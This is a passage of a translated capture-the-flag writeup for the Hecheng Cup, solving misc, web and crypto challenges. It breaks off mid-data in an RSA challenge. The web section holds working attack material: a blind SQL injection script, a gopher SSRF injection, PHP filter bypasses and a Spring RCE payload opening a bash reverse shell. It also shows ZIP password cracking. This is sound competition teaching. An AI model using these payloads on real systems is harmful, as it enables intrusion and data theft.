Hecheng Cup (鹤城杯) writeup

misc

new_misc

The attachment opens as a PDF file; decoding it directly with wbStego4.3open, with no password, gives the flag.

flag{verY_g00d_YoU_f0und_th1s}

Traffic analysis

Analysing the capture shows GET-based SQL injection of the following form:

ascii(substr((select%20flag%20from%20t) 1 1))=102

Extract the ASCII code values:

❯ tcpdump -r timu.pcapng -A | grep 'substr' | awk -F 'GET' '{print $2}' | awk -F '=' '{print $3}' | awk -F '--+' '{print $1}' > flag.txt

with open("flag.txt", "r") as f:
    lines = f.readlines()  # read the whole file and return it as a list
n = len(lines)
flag = ''
for i in range(1, n):
    a = int(lines[i-1].replace('\n', '').replace('\r', ''))
    b = int(lines[i].replace('\n', '').replace('\r', ''))
    # a tested value followed by a smaller one means the scan moved on to the
    # next character, so the previous value was the match
    if a > b:
        flag = flag + chr(a)
        print("\r{}".format(flag), end='')

#flag{w1reshARK_ez_1sntit}~~~~

Misc2

zsteg recovers the hidden data:

❯ zsteg check.png
b1,r,lsb,xy .. text: "CbBbBbCbFbBbFbGbGbGbBbCbGbGbGbCbCbBbFbCbCbGbGbCbCbGbFbCbCbG"
b1,rgb,lsb,xy .. text: "flag{h0w_4bouT_enc0de_4nd_pnG}m"
b1,bgr,lsb,xy .. <wbStego size=180, ext="\x00,\x0E", data="\xCCl\e\x8D\xAC\x0E\xCCm\x0E\x8D"..., even=false>
b2,r,lsb,xy .. text: "UUUUUUUUU@"
b2,r,msb,xy .. text: "}u]|)t]u|5\th}u]"
b2,b,lsb,xy .. text: "KA{@AAA@AA"
b2,rgba,lsb,xy .. text: "#c77s#77#s"
b3,abgr,msb,xy .. text: "tR'u@'}@/r"
b4,r,lsb,xy .. text: "FDDDDfvEDDUETD2#\"$TE2$TEDDR#2\"2gDDU#2\"2#\"C2%TB2#\"\"2C2\"0%DEV#2\"2#\"#3#2\"2#\"#3ETB2#\"#3#2\"2#\"\"2#2\"2"
b4,b,lsb,xy .. text: "fdTETETDtDT#TEWgTDTETETETDTETE2#TDR#2#S\""
b4,rgb,lsb,xy .. text: "!T'Rd7BU41B"
b4,bgr,lsb,xy .. text: "Q'$bW4RD5A4"
b4,rgba,lsb,xy .. text: "Bo@o@o@oAOo_nO~Oo_A_QO@OA_A_@OQOQO@"
b4,abgr,msb,xy .. text: " o$o o o /("

Unicode-decoding the text gives the flag:

&#x66;&#x6c;&#x61;&#x67;&#x7b;&#x68;&#x30;&#x77;&#x5f;&#x34;&#x62;&#x6f;&#x75;&#x54;&#x5f;&#x65;&#x6e;&#x63;&#x30;&#x64;&#x65;&#x5f;&#x34;&#x6e;&#x64;&#x5f;&#x70;&#x6e;&#x47;&#x7d;
#flag{h0w_4bouT_enc0de_4nd_pnG}

a_misc

john cracks the password: qwer

❯ zip2john amisc.zip > info.txt
ver 2.0 amisc.zip/1.png PKZIP Encr: cmplen=18925, decmplen=19966, crc=425F07BE
❯ john info.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
qwer (amisc.zip/1.png)
1g 0:00:00:00 DONE 2/3 (2021-10-08 12:16) 9.090g/s 310372p/s 310372c/s 310372C/s modem..robocop
Use the "--show" option to display all of the cracked passwords reliably
Session completed
❯ john info.txt --show
amisc.zip/1.png:qwer:1.png:amisc.zip::amisc.zip

1 password hash cracked, 0 left

Repair the image:

import binascii
import struct
import sys

file = '1.png'
fr = open(file,'rb').read()
# IHDR chunk type + data (0x0c-0x1c): the bytes covered by the chunk CRC
data = bytearray(fr[0x0c:0x1d])
# CRC stored in the file right after the IHDR data
crc32key = int.from_bytes(fr[0x1d:0x21], 'big')
# original code: crc32key = eval(str(fr[29:33]).replace('\\x','').replace("b'",'0x').replace("'",''))
n = 4095
for w in range(n):
    width = bytearray(struct.pack('>i', w))
    for h in range(n):
        height = bytearray(struct.pack('>i', h))
        for x in range(4):
            data[x+4] = width[x]
            data[x+8] = height[x]
        crc32result = binascii.crc32(data) & 0xffffffff
        if crc32result == crc32key:
            print(width,height)
            newpic = bytearray(fr)
            for x in range(4):
                newpic[x+16] = width[x]
                newpic[x+20] = height[x]
            with open(file+'re.png','wb') as fw:
                fw.write(newpic)
            sys.exit()

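This yields the image.

Downloading gives a packet capture; analysis shows blind SQL injection, and the information is extracted in the same way:
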
❯ tcpdump -r file.pcap -A | grep 'flag' | awk -F 'limit' '{print $2}' | awk -F 'sleep' '{print $1}' | awk -F '%2C' '{print $4}' | awk -F '%3D' '{print $2}' > flag.txt

with open("flag.txt", "r") as f:
    lines = f.readlines()  # read the whole file and return it as a list
n = len(lines)
flag = ''
for i in range(1, n):
    a = int(lines[i-1].replace('\n', '').replace('\r', ''))
    b = int(lines[i].replace('\n', '').replace('\r', ''))
    # a tested value followed by a smaller one means the scan moved on to the
    # next character, so the previous value was the match
    if a > b:
        flag = flag + chr(a)
        print("\r{}".format(flag), end='')
#flag{cd2c3e2fea463ded9af800d7155be7aq}
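
Both blind-injection captures above are decoded with the same "value followed by a smaller one" heuristic. The added example below (not part of the original writeup) instead rebuilds the leaked string per character position from the request lines, using the probe shape of the first capture; the `id` parameter, the sample requests and the assumption of a linear scan that stops at the first hit are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Probe shape shown in the writeup, after percent-decoding:
#   ascii(substr((<subquery>),<pos>,1))=<value>
PROBE = re.compile(
    r"ascii\(substr\(\((?P<query>.+?)\)\s*,\s*(?P<pos>\d+)\s*,\s*1\)\)"
    r"\s*=\s*(?P<val>\d+)",
    re.IGNORECASE,
)


def parse_probes(lines):
    """Yield (subquery, position, value) for each request line holding a probe."""
    for line in lines:
        m = PROBE.search(unquote(line))
        if m:
            yield m["query"].strip().lower(), int(m["pos"]), int(m["val"])


def reconstruct(lines, ceiling=126):
    """Rebuild what the scanning client learned, per subquery.

    Assumption: the scan is linear and stops at the first hit, so the last
    value requested for a position is that character. A position whose last
    value reached `ceiling` never matched (the scan ran past the end).
    """
    last = {}
    for query, pos, val in parse_probes(lines):
        last.setdefault(query, {})[pos] = val
    result = {}
    for query, by_pos in last.items():
        chars = []
        for pos in sorted(by_pos):
            if by_pos[pos] >= ceiling:
                break
            chars.append(chr(by_pos[pos]))
        result[query] = "".join(chars)
    return result


def descent_decode(lines):
    """The writeup's heuristic: a value followed by a smaller one was a hit."""
    vals = [val for _, _, val in parse_probes(lines)]
    return "".join(chr(a) for a, b in zip(vals, vals[1:]) if a > b)


def sample_requests(secret, overrun=True, low=32, high=126):
    """Constructed request lines (not taken from the challenge captures)."""
    tmpl = ("GET /?id=1%20and%20ascii(substr((select%20flag%20from%20t),"
            "{p},1))={v}--+ HTTP/1.1")
    lines = ["GET /favicon.ico HTTP/1.1"]  # unrelated request, must be skipped
    for pos, ch in enumerate(secret, start=1):
        lines += [tmpl.format(p=pos, v=v) for v in range(low, ord(ch) + 1)]
    if overrun:  # one position past the end: every candidate up to `high` fails
        lines += [tmpl.format(p=len(secret) + 1, v=v)
                  for v in range(low, high + 1)]
    return lines


if __name__ == "__main__":
    full = sample_requests("fl4g")
    cut = sample_requests("fl4g", overrun=False)  # capture ends at the last hit
    print(reconstruct(full), descent_decode(full))
    print(reconstruct(cut), descent_decode(cut))  # heuristic drops the last char
```

When the capture ends right at the last hit, the positional reconstruction keeps the final character while the descent heuristic loses it, because no smaller value follows.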

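Can you find the flag? (你能找到flag吗)

m1

This is a reused challenge from the Diaoyucheng Cup (钓鱼城杯).

ZIP known-plaintext attack

The hint in the archive comment identifies this as a ZIP known-plaintext attack:
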
Password is longer than 16 bytes, and includes at least one number and one uppercase letter.
Feel free to crack it if you can, probably with your high-performance quantum computer :)

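First extract the capture.pcapng data, which runs from 0x2C to 0xD8663.

The second part of the pcapng file header has a fixed format, so it is used as the known plaintext for the attack:
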
00 00 4D 3C 2B 1A 01 00 00 00 FF FF FF FF FF FF FF FF
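
Why these 18 bytes sit at offset 6 follows from the layout of the pcapng Section Header Block. The added example below (not from the original writeup) builds such a block and checks the span; it assumes a little-endian file with version 1.0 and section length -1, and the option bytes are constructed filler.

```python
import struct

SHB_TYPE = 0x0A0D0D0A          # block type of a Section Header Block
BYTE_ORDER_MAGIC = 0x1A2B3C4D  # stored in the writer's byte order
KNOWN = bytes.fromhex("00004D3C2B1A01000000FFFFFFFFFFFFFFFF")  # bytes from the writeup
OFFSET = 6                     # the value given to bkcrack's -o option


def build_shb(options=b""):
    """Little-endian Section Header Block: version 1.0, section length -1."""
    options = options + b"\x00" * (-len(options) % 4)   # keep 32-bit alignment
    body = struct.pack("<IHHq", BYTE_ORDER_MAGIC, 1, 0, -1) + options
    total = 4 + 4 + len(body) + 4   # type, length, body, repeated length
    return struct.pack("<II", SHB_TYPE, total) + body + struct.pack("<I", total)


def header_fields(shb):
    """Return (offset, name, raw bytes, predictable?) for the first 24 bytes."""
    layout = [
        (0, 4, "block type", True),
        (4, 2, "block length, low 16 bits", False),   # depends on the options
        (6, 2, "block length, high 16 bits", True),   # zero while block < 64 KiB
        (8, 4, "byte-order magic", True),
        (12, 2, "major version", True),
        (14, 2, "minor version", True),
        (16, 8, "section length", True),              # -1 means "not specified"
    ]
    return [(off, name, shb[off:off + size], fixed)
            for off, size, name, fixed in layout]


def known_plaintext_matches(shb):
    """True when the block carries the writeup's bytes at the writeup's offset."""
    return shb[OFFSET:OFFSET + len(KNOWN)] == KNOWN


if __name__ == "__main__":
    for opts in (b"", b"A" * 60):   # constructed option payloads of two sizes
        shb = build_shb(opts)
        print(len(shb), known_plaintext_matches(shb))
        for off, name, raw, fixed in header_fields(shb):
            print(f"  {off:2d} {name:28s} {raw.hex():16s} {'fixed' if fixed else 'varies'}")
```

Any file format with a fixed header of this length hands the same kind of known plaintext to anyone holding a ZipCrypto-encrypted archive, however long the password is; AES-based ZIP encryption does not have this weakness.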

Run the known-plaintext attack with bkcrack:

echo -n "00004D3C2B1A01000000FFFFFFFFFFFFFFFF" | xxd -r -ps > pcapng
❯ bkcrack -C MI.zip -c capture.pcapng -p pcapng -o 6
bkcrack 1.3.1 - 2021-08-16
[21:18:17] Z reduction using 10 bytes of known plaintext
100.0 % (10 / 10)
[21:18:17] Attack on 642004 Z values at index 13
Keys: e33a580c c0c96a81 1246d892
81.3 % (522146 / 642004)
[21:28:57] Keys
e33a580c c0c96a81 1246d892
❯ bkcrack -C MI.zip -c capture.pcapng -k e33a580c c0c96a81 1246d892 -d capture_out.pcapng
bkcrack 1.3.1 - 2021-08-16
[21:29:32] Writing deciphered data capture_out.pcapng (maybe compressed)
Wrote deciphered data.
❯ bkcrack -C MI.zip -c hint_for_capture.txt -k e33a580c c0c96a81 1246d892 -d hint_for_capture_out.txt
bkcrack 1.3.1 - 2021-08-16
[21:29:40] Writing deciphered data hint_for_capture_out.txt (maybe compressed)
Wrote deciphered data.
❯ cat hint_for_capture_out.txt
you can get some base**-encoded data

Traffic analysis

After extraction and URL-decoding, the SQL statements are visible:

SUBSTR((SELECT COALESCE(CAST(flag AS TEXT),CAST(X'20' AS TEXT)) FROM flags LIMIT 0,1),138,1)>CAST(X'69' AS TEXT)

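I did not understand the writeup and do not know how the extraction is done.

Extracting the information and, following the hint, base85-decoding it gives:

flag is md5("Sq1it3" + archive password)
Hint: the password is an ID card number, and the birth year has exactly two prime factors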

Brute-forcing the archive

The official writeup uses C++.

Generate the ID-number wordlist:

import time

# generate every date of the birth year
def dateRange(year):
    fmt = '%Y-%m-%d'
    bgn = int(time.mktime(time.strptime(year+'-01-01',fmt)))
    end = int(time.mktime(time.strptime(year+'-12-31',fmt)))
    list_date = [time.strftime(fmt,time.localtime(i)) for i in range(bgn,end+1,3600*24)]
    return [i.replace('-','') for i in list_date]

# first six digits of the ID number
with open('p.txt','r') as f:
    lines=f.readlines()
for line in lines:
    id6 = line.replace('\n', '').replace('\r', '')
    #print(id6)
    # digits 7-14 of the ID number
    for x in range(2020,1980,-1):
        data_time = dateRange(str(x))
        #print(len(data_time))
        for y in range(len(data_time)):
            id8 = data_time[y]

            # digits 15-17 of the ID number
            for z in range(1000):
                if z<10:
                    z = '00'+str(z)
                elif 10<=z and z<100:
                    z ='0'+str(z)
                else:
                    z=str(z)
                s = id6 + id8 + z +'X'
                with open('password.txt', 'a') as f:
                    f.write(s+'\n')

Crack it with zip2john and john:

❯ zip2john -a hint_for_capture_out.txt MI.zip > john.txt
Using file hint_for_capture_out.txt as an 'ASCII' quick check file
ver 1.0 MI.zip/capture.pcapng PKZIP Encr: cmplen=886328, decmplen=886316, crc=2C1486C4
ver 1.0 MI.zip/hint_for_capture.txt PKZIP Encr: cmplen=48, decmplen=36, crc=E66A9C5
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
❯ john --wordlist=/home/jxswcy/Desktop/password.txt john.txt
# (output omitted)
❯ john --show john.txt
MI.zip:32070119840810108X::MI.zip:hint_for_capture.txt, capture.pcapng:MI.zip

1 password hash cracked, 0 left

The MD5 gives the flag:

❯ md5 -s Sq1it332070119840810108X
MD5 ("Sq1it332070119840810108X") = 5cae25efeb73d7ba22f7728427376f59

web

middle_magic

<?php
highlight_file(__FILE__);
include "./flag.php";
include "./result.php";
if(isset($_GET['aaa']) && strlen($_GET['aaa']) < 20){

    $aaa = preg_replace('/^(.*)level(.*)$/', '${1}<!-- filtered -->${2}', $_GET['aaa']);

    if(preg_match('/pass_the_level_1#/', $aaa)){
        echo "here is level 2";

        if (isset($_POST['admin']) and isset($_POST['root_pwd'])) {
            if ($_POST['admin'] == $_POST['root_pwd'])
                echo '<p>The level 2 can not pass!</p>';
            // START FORM PROCESSING
            else if (sha1($_POST['admin']) === sha1($_POST['root_pwd'])){
                echo "here is level 3,do you kown how to overcome it?";
                if (isset($_POST['level_3'])) {
                    $level_3 = json_decode($_POST['level_3']);

                    if ($level_3->result == $result) {

                        echo "success:".$flag;
                    }
                    else {
                        echo "you never beat me!";
                    }
                }
                else{
                    echo "out";
                }
            }
            else{

                die("no");
            }
            // perform validations on the form data
        }
        else{
            echo '<p>out!</p>';
        }

    }

    else{
        echo 'nonono!';
    }

    echo '<hr>';
}

?>

payload

get
?aaa=%0apass_the_level_1%23
post
admin[]=a&root_pwd[]=b&level_3={"result":0}

easy_sql_21

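admin:admin logs in successfully, and the database name (ctf) and version (8.0.26-0) are easy to extract by injection.

password=admin&username=admin'/**/and/**/ascii(substr((database()),1,1))>0#
password=admin&username=admin
select and tables are filtered, so the table name is not known.

Database and table names are case-insensitive; use the table statement for column-by-column comparison.

Database name: ctf

('def','{flag+chr(ascii)}','~','~','~','~')>(table information_schema.schemata limit 4,1)
Table name: fl11aag (innodb_table_stats is used to get around the filter on tables)

('ctf','{flag+chr(ascii)}','2021-04-30 21:15:31',0,0,0)>(table mysql.innodb_table_stats limit 1,1)
Record (the flag is mixed-case; fortunately the flag table has only one row, so it can be queried directly without column comparison)

exp:
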
import requests
url='http://182.116.62.85:26571/login.php'
select='hex((table ctf.fl11aag limit 1,1))'.replace(' ','/**/')

flag=''
for i in range(1,100):
    for ascii in range(1,128):
        # payload=f"password=admin&username=admin'/**/and/**/ascii(substr(({select}),{i},1))={ascii}#"
        # payload=f"password=admin&username=admin"
        # response=requests.get(url=url)
        # response=requests.post(url=url, data=payload)
        # response=requests.post(url,data={"password":"admin","username":f"'/**/or/**/ascii(substr(({select}),{i},1))={ascii}#"})
        response=requests.post(url,data={"password":"admin","username":f"'/**/or/**/ascii(substr(({select}),{i},1))={ascii}#"})
        # data={"password":"admin","username":f"'/**/or/**/('def','{flag+chr(ascii)}','~','~','~','~')>(table information_schema.schemata limit 4,1)#".replace(' ','/**/')}
        # data={"password":"admin","username":f"'/**/or/**/('ctf','{flag+chr(ascii)}','2021-04-30 21:15:31',0,0,0)>(table mysql.innodb_table_stats limit 1,1)#".replace(' ','/**/')}
        # response=requests.post(url,data=data)
        # print(data,response.text)
        if 'success' in response.text:
            flag+=chr(ascii)
            print(flag)
            break
        if ascii==127:
            exit(0)

easy_sql_1

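SSRF against MySQL. Logging in with admin:admin works, but I spent a long time injecting without getting anything out; only after asking other players after the contest did I learn that this is a reused challenge and that the injection point is in the cookie set after a successful login.

Cookie: this_is_your_cookie=YWRtaW4%3D;
Error-based injection with no filtering at all; the data comes straight out.
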
# import base64
# print(base64.b64encode(b'test'))

import requests
import base64
from urllib.parse import quote
url="http://182.116.62.85:28303/use.php"
data="""POST / HTTP/1.1
Host: 127.0.0.1
Content-Type:application/x-www-form-urlencoded
Cookie: this_is_your_cookie={}
Content-Length: {}
{}
"""
payload="""uname=admin&passwd=admin"""
# data=quote(data.format(base64.b64encode("admin') and updatexml(1,concat(0x7e,(select database())),1)#".encode("utf-8")).decode('utf8'),len(payload),payload)).replace('%0a','%0d%0a')
# data=quote(data.format(base64.b64encode("admin') and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 3,1)),1)#".encode("utf-8")).decode('utf8'),len(payload),payload)).replace('%0a','%0d%0a')
data=quote(data.format(base64.b64encode(b"admin') and updatexml(1,concat(0x7e,(select flag from flag)),1)#").decode('utf8'),len(payload),payload)).replace('%0a','%0d%0a')
params={
    "url":"gopher://127.0.0.1:80/_"+data
}
print(params)
response=requests.get(url=url,params=params)
print('this_is_your_cookie' in response.text)
print(response.text)

EasyP

<?php
include 'utils.php';

if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if ($guess === $secret) {
        $message = 'Congratulations! The flag is: ' . $flag;
    } else {
        $message = 'Wrong. Try Again';
    }
}

if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("hacker :)");
}

if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
    exit("hacker :)");
}

if (isset($_GET['show_source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}else{
    show_source(__FILE__);
}
?>

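See Zer0pts 2020 "Can you guess it?"; this challenge adds one extra trick.

$_SERVER['PHP_SELF'] returns the name of the currently executing script.

'PHP_SELF'
The filename of the currently executing script, relative to the document root. For instance, $_SERVER['PHP_SELF'] in a script at the address http://example.com/foo/bar.php would be /foo/bar.php. The __FILE__ constant contains the full path and filename of the current (i.e. included) file. Since PHP 4.3.0, if PHP is running in command-line mode this variable contains the script name. In earlier versions it was not available.

basename() returns the filename component of a path.
If /index.php/config.php/ is requested, $_SERVER['PHP_SELF'] returns /index.php/config.php/ and basename($_SERVER['PHP_SELF']) returns config.php.
That is, /index.php/config.php/ runs index.php, but basename() yields config.php.
Normally /index.php/config.php?source would read the file, but the regex /config\.php\/*$/i blocks URLs that end in config.php, so nothing is returned.
The trick used here is a property of basename(): it discards non-ASCII characters when it encounters them.
Byte values range from 0 to 255, but ASCII does not define characters numbered 128~255; the ASCII table covers 0-127. So passing a value of 128 or above gets past the regex (128 -> 0x80).
That is, basename("config.php/\xff") is actually config.php, and this property can be used to get past the match in preg_match('/config\.php\/*$/i').

Underscore (_) bypass

According to the official documentation page "Variables From External Sources", a note by Anonymous states:

The full list of field-name characters that PHP converts to _ (underscore) is the following (not just dot):
chr(32) ( ) (space)
chr(46) (.) (dot)
chr(91) ([) (open square bracket)
chr(128) - chr(159) (various)
PHP irreversibly modifies field names containing these characters in order to maintain compatibility with the deprecated register_globals feature.

The article "深入研究preg_replace与代码执行" (an in-depth study of preg_replace and code execution) mentions another property:

When the illegal character is the first character, only the dot is replaced with an underscore.
payload
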
index.php/utils.php/%ff?show[source

Spring1

https://www.cnblogs.com/cute-puli/p/13363752.html

_eventId_confirm=&_csrf=57033da7-4538-42ec-9933-e12ac3e97db5&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/x.x.x.x/2333+0>%261")).start()=vulhub

crypto

easy_crypto

公正公正公正诚信文明公正民主公正法治法治诚信民主自由敬业公正友善公正平等平等法治民主平等平等和谐敬业自由诚信平等和谐平等公正法治法治平等平等爱国和谐公正平等敬业公正敬业自由敬业平等自由法治和谐平等文明自由诚信自由平等富强公正敬业平等民主公正诚信和谐公正文明公正爱国自由诚信自由平等文明公正诚信富强自由法治法治平等平等自由平等富强法治诚信和谐

Decode it with the Core Socialist Values encoding (核心价值观编码):

flag{IlUqU9O5guX6YiITsRNPiQmbhNRjGuTP}

a_crypto

4O595954494Q32515046324757595N534R52415653334357474R4N575955544R4O5N4Q46434S4O59474253464Q5N444R4Q51334557524O5N4S424944473542554O595N44534O324R49565746515532464O49345649564O464R4R494543504N35
#rot13
4B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35
#hex
KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5
#base32
V143Pytkc2lAYlV3SlRmVXQ9X0dVdmd6KEYpP3t4V29+MElXSER9TUEkPA==
#base64
W^7?+dsi@bUwJTfUt=_GUvgz(F)?{xWo~0IWHD}MA$<
#base85
flag{W0w_y0u_c4n_rea11y_enc0d1ng!}

ciphey solves it directly:

❯ ciphey -t '4O595954494Q32515046324757595N534R52415653334357474R4N575955544R4O5N4Q46434S4O59474253464Q5N444R4Q51334557524O5N4S424944473542554O595N44534O324R49565746515532464O49345649564O464R4R494543504N35'
Possible plaintext: 'flag{W0w_y0u_c4n_rea11y_enc0d1ng!}' (y/N): y
╭────────────────────────────────────────────────────────╮
│ The plaintext is a Capture The Flag (CTF) Flag │
│ Formats used: │
│ caesar: │
│ Key: 13 │
│ base16 │
│ utf8 │
│ base32 │
│ utf8 │
│ base64 │
│ utf8 │
│ base85 │
│ utf8Plaintext: "flag{W0w_y0u_c4n_rea11y_enc0d1ng!}"
╰────────────────────────────────────────────────────────╯

babyrsa

from Crypto.Util.number import getPrime, bytes_to_long
from secret import flag

p = getPrime(1024)
q = getPrime(1024)
n = p * q
e = 65537
hint1 = p >> 724
hint2 = q % (2 ** 265)
ct = pow(bytes_to_long(flag), e, n)
print(hint1)
print(hint2)
print(n)
print(ct)
1514296530850131082973956029074258536069144071110652176122006763622293335057110441067910479
40812438243894343296354573724131194431453023461572200856406939246297219541329623
21815431662065695412834116602474344081782093119269423403335882867255834302242945742413692949886248581138784199165404321893594820375775454774521554409598568793217997859258282700084148322905405227238617443766062207618899209593375881728671746850745598576485323702483634599597393910908142659231071532803602701147251570567032402848145462183405098097523810358199597631612616833723150146418889589492395974359466777040500971885443881359700735149623177757865032984744576285054725506299888069904106805731600019058631951255795316571242969336763938805465676269140733371287244624066632153110685509892188900004952700111937292221969
19073695285772829730103928222962723784199491145730661021332365516942301513989932980896145664842527253998170902799883262567366661277268801440634319694884564820420852947935710798269700777126717746701065483129644585829522353341718916661536894041337878440111845645200627940640539279744348235772441988748977191513786620459922039153862250137904894008551515928486867493608757307981955335488977402307933930592035163126858060189156114410872337004784951228340994743202032248681976932591575016798640429231399974090325134545852080425047146251781339862753527319093938929691759486362536986249207187765947926921267520150073408188188

exp

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from Crypto.Util.number import *
from gmpy2 import *
from tqdm import tqdm
import sys

p0 = 1514296530850131082973956029074258536069144071110652176122006763622293335057110441067910479
q2 = 40812438243894343296354573724131194431453023461572200856406939246297219541329623
n = 21815431662065695412834116602474344081782093119269423403335882867255834302242945742413692949886248581138784199165404321893594820375775454774521554409598568793217997859258282700084148322905405227238617443766062207618899209593375881728671746850745598576485323702483634599597393910908142659231071532803602701147251570567032402848145462183405098097523810358199597631612616833723150146418889589492395974359466777040500971885443881359700735149623177757865032984744576285054725506299888069904106805731600019058631951255795316571242969336763938805465676269140733371287244624066632153110685509892188900004952700111937292221969
c = 19073695285772829730103928222962723784199491145730661021332365516942301513989932980896145664842527253998170902799883262567366661277268801440634319694884564820420852947935710798269700777126717746701065483129644585829522353341718916661536894041337878440111845645200627940640539279744348235772441988748977191513786620459922039153862250137904894008551515928486867493608757307981955335488977402307933930592035163126858060189156114410872337004784951228340994743202032248681976932591575016798640429231399974090325134545852080425047146251781339862753527319093938929691759486362536986249207187765947926921267520150073408188188
e = 0x10001

# q2 -> p2
known_low_bits = 265
n2 = bin(n)[2:][-known_low_bits:]
p2 = ''
for i in range(known_low_bits):
    if bin(int('1' + p2, 2) * q2)[2:].endswith(n2[-(i+1):]):
        p2 = '1' + p2
    else:
        p2 = '0' + p2
p2 = int(p2, 2)
# print(bin(p2 * q2)[2:][-known_low_bit:])
# print(n2)

# p2, p0 -> p
p0 = p0 << 724
unknown_bits = 459
# PR.<x> is Sage preparser syntax, so this script has to be run with SageMath
PR.<x> = PolynomialRing(Zmod(n))
for bit in range(10):
    fx = p0 + x * 2 ^ (265 + bit) + p2
    for i in tqdm(range(2**bit)):
        f = fx + i * 2 ^ 265
        f = f.monic()
        kbits = unknown_bits - bit
        p1 = f.small_roots(X=2 ^ kbits, beta=0.4)
        if p1:
            p = p0 + int(p1[0]) * 2 ^ (265 + bit) + p2 + i * 2 ^ 265
            assert n % p == 0
            q = n // p
            print(long_to_bytes(pow(c, invert(e, n-p-q+1), n)))
            sys.exit(0)
#flag{ef5e1582-8116-4f61-b458-f793dc03f2ff}

Crazy_Rsa_Tech

from Crypto.Util.number import *
from Crypto.Util.Padding import *

FLAG = bytes_to_long(pad(b"flag{??????}",64))
def init_key():
    p, q = getPrime(512), getPrime(512)
    n = p*q
    e = 9
    while(GCD((p-1)*(q-1),e)!=1):
        p, q = getPrime(512), getPrime(512)
        n = p*q
    d = inverse(e,(p-1)*(q-1))
    return n,e,d

n_list=list()
c_list=list()
for i in range(9):
    N,e,d=init_key()
    n_list.append(N)
    c=pow(FLAG,e,N)
    c_list.append(pow(FLAG,e,N))
    assert(pow(c,d,N)==FLAG)
print("n_list:",n_list)
print("c_list:",c_list)
n_list: [71189786319102608575263218254922479901008514616376166401353025325668690465852130559783959409002115897148828732231478529655075366072137059589917001875303598680931962384468363842379833044123189276199264340224973914079447846845897807085694711541719515881377391200011269924562049643835131619086349617062034608799, 92503831027754984321994282254005318198418454777812045042619263533423066848097985191386666241913483806726751133691867010696758828674382946375162423033994046273252417389169779506788545647848951018539441971140081528915876529645525880324658212147388232683347292192795975558548712504744297104487514691170935149949, 100993952830138414466948640139083231443558390127247779484027818354177479632421980458019929149817002579508423291678953554090956334137167905685261724759487245658147039684536216616744746196651390112540237050493468689520465897258378216693418610879245129435268327315158194612110422630337395790254881602124839071919, 59138293747457431012165762343997972673625934330232909935732464725128776212729547237438509546925172847581735769773563840639187946741161318153031173864953372796950422229629824699580131369991913883136821374596762214064774480548532035315344368010507644630655604478651898097886873485265848973185431559958627423847, 66827868958054485359731420968595906328820823695638132426084478524423658597714990545142120448668257273436546456116147999073797943388584861050133103137697812149742551913704341990467090049650721713913812069904136198912314243175309387952328961054617877059134151915723594900209641163321839502908705301293546584147, 120940513339890268554625391482989102665030083707530690312336379356969219966820079510946652021721814016286307318930536030308296265425674637215009052078834615196224917417698019787514831973471113022781129000531459800329018133248426080717653298100515701379374786486337920294380753805825328119757649844054966712377, 
72186594495190221129349814154999705524005203343018940547856004977368023856950836974465616291478257156860734574686154136925776069045232149725101769594505766718123155028300703627531567850035682448632166309129911061492630709698934310123778699316856399909549674138453085885820110724923723830686564968967391721281, 69105037583161467265649176715175579387938714721653281201847973223975467813529036844308693237404592381480367515044829190066606146105800243199497182114398931410844901178842049915914390117503986044951461783780327749665912369177733246873697481544777183820939967036346862056795919812693669387731294595126647751951, 76194219445824867986050004226602973283400885106636660263597964027139613163638212828932901192009131346530898961165310615466747046710743013409318156266326090650584190382130795884514074647833949281109675170830565650006906028402714868781834693473191228256626654011772428115359653448111208831188721505467497494581]
c_list: [62580922178008480377006528793506649089253164524883696044759651305970802215270721223149734532870729533611357047595181907404222690394917605617029675103788705320032707977225447998111744887898039756375876685711148857676502670812333076878964148863713993853526715855758799502735753454247721711366497722251078739585, 46186240819076690248235492196228128599822002268014359444368898414937734806009161030424589993541799877081745454934484263188270879142125136786221625234555265815513136730416539407710862948861531339065039071959576035606192732936477944770308784472646015244527805057990939765708793705044236665364664490419874206900, 85756449024868529058704599481168414715291172247059370174556127800630896693021701121075838517372920466708826412897794900729896389468152213884232173410022054605870785910461728567377769960823103334874807744107855490558726013068890632637193410610478514663078901021307258078678427928255699031215654693270240640198, 14388767329946097216670270960679686032536707277732968784379505904021622612991917314721678940833050736745004078559116326396233622519356703639737886289595860359630019239654690312132039876082685046329079266785042428947147658321799501605837784127004536996628492065409017175037161261039765340032473048737319069656, 1143736792108232890306863524988028098730927600066491485326214420279375304665896453544100447027809433141790331191324806205845009336228331138326163746853197990596700523328423791764843694671580875538251166864957646807184041817863314204516355683663859246677105132100377322669627893863885482167305919925159944839, 2978800921927631161807562509445310353414810029862911925227583943849942080514132963605492727604495513988707849133045851539412276254555228149742924149242124724864770049898278052042163392380895275970574317984638058768854065506927848951716677514095183559625442889028813635385408810698294574175092159389388091981, 
